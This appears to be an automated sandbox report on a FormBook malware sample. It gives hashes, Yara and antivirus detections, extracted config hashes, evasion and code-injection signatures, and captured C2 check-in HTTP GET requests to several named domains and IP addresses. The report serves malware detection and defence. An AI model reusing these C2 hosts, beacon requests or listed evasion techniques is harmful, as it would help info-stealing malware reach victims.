Analysis Report zHgm9k7WYU.exe

Overview

General Information

Sample Name:	zHgm9k7WYU.exe
Analysis ID:	339322
MD5:	d97a26894ec19dc562eec833ccb5607f
SHA1:	5aa0632c496d7e1441eef50c61c6a97c5adee565
SHA256:	2fdfbfc735f43a4e2dce0c849b41ab83dd17228f6df983f7a95d6e427cdc77b0
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d570", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d66e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9b9701d9", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: zHgm9k7WYU.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe

Unpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack

Uses 32bit PE files

Source: zHgm9k7WYU.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: zHgm9k7WYU.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: explorer.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.574401869.000000000567F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe
Source:	Binary string: explorer.pdb source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_057EA5DC
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_057ECDF8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_057ECDF8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_057EA5D0
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_057ED118
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_057ED118
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_057ED10F
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_057ED10F
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then xor edx, edx	0_2_057ED050
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then xor edx, edx	0_2_057ED047
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_057ECDEC
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_057ECDEC
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_057ECC7F
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 4x nop then pop ebx	1_2_00407B07
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop ebx	7_2_010A7B07

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1Host: www.ricardoinman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.www7456.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1Host: www.theatomicshots.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.fallgus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1Host: www.bigdudedesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 199.59.242.153 199.59.242.153
Source: Joe Sandbox View	IP Address: 198.49.23.144 198.49.23.144
Source: Joe Sandbox View	IP Address: 198.49.23.144 198.49.23.144

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU

Source: C:\Windows\explorer.exe

Code function: 2_2_074BC782 getaddrinfo,setsockopt,recv,

2_2_074BC782

Source: global traffic	HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1Host: www.ricardoinman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.www7456.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1Host: www.theatomicshots.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.fallgus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1Host: www.bigdudedesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.ricardoinman.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Jan 2021 19:59:51 GMTContent-Type: text/htmlContent-Length: 505Connection: closeETag: "5f98d73b-1f9"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>

Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00419D60 NtCreateFile,	1_2_00419D60
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00419E10 NtReadFile,	1_2_00419E10
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00419E90 NtClose,	1_2_00419E90
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00419F40 NtAllocateVirtualMemory,	1_2_00419F40
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00419D5A NtCreateFile,	1_2_00419D5A
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00419E8A NtClose,	1_2_00419E8A
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00419F3A NtAllocateVirtualMemory,	1_2_00419F3A
Source: C:\Windows\explorer.exe	Code function: 2_2_074BBA32 NtCreateFile,	2_2_074BBA32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9540 NtReadFile,LdrInitializeThunk,	7_2_055C9540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C95D0 NtClose,LdrInitializeThunk,	7_2_055C95D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9710 NtQueryInformationToken,LdrInitializeThunk,	7_2_055C9710
